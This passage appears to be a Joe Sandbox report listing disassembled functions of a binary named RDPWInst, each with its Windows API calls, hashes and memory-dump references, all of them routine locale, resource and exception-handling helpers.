                                                    • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                    • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                    • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                    • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                    Function 00412D04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleThread
                                                    • String ID: 0\D$`\D$|\D
                                                    • API String ID: 635194068-1443555069
                                                    • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                    • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                    • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                    • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                    Function 004114A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID: $yyyy
                                                    • API String ID: 3303714858-404527807
                                                    • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                    • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                    • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                    • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                    Function 0043C45C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                    • API String ID: 237503144-3145546840
                                                    • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                    • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                    • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                    • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                    Function 0040AEAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                    • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                      • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$ErrorFindLastLoadLock
                                                    • String ID: CHARTABLE
                                                    • API String ID: 1074440638-2668339182
                                                    • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                    • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                    • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                    • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                    Function 00419584 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                    • VariantClear.OLEAUT32(?), ref: 004196EF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                    • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                    • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                    • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                    Function 0041325C Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                    • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                    • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                    • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                    • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                    Function 00408B08 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                      • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                      • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Thread$LanguagesPreferred$Language
                                                    • String ID:
                                                    • API String ID: 2255706666-0
                                                    • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                    • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                    • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                    • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                    Function 0042FB48 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                    • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                    • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                    • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                    • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                    • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                    • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                    Function 0040A0E6 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                    • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                    • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeavelstrcmpi
                                                    • String ID: YD
                                                    • API String ID: 2420758022-4277794568
                                                    • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                    • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                    • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                    • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                    Function 004059C6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID: $$@
                                                    • API String ID: 3192549508-1194432280
                                                    • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                    • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                    • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                    • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                    Function 0040589A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID: $$@
                                                    • API String ID: 3192549508-1194432280
                                                    • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                    • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                    • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                    • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                    Function 00411498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID:
                                                    • API String ID: 3303714858-3916222277
                                                    • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                    • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                    • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                    • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                    Function 004150E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32 ref: 00415102
                                                    • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleMetricsSystemThread
                                                    • String ID: p[D
                                                    • API String ID: 3035471613-2202972244
                                                    • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                    • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                    • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                    • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                    Function 0043A688 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
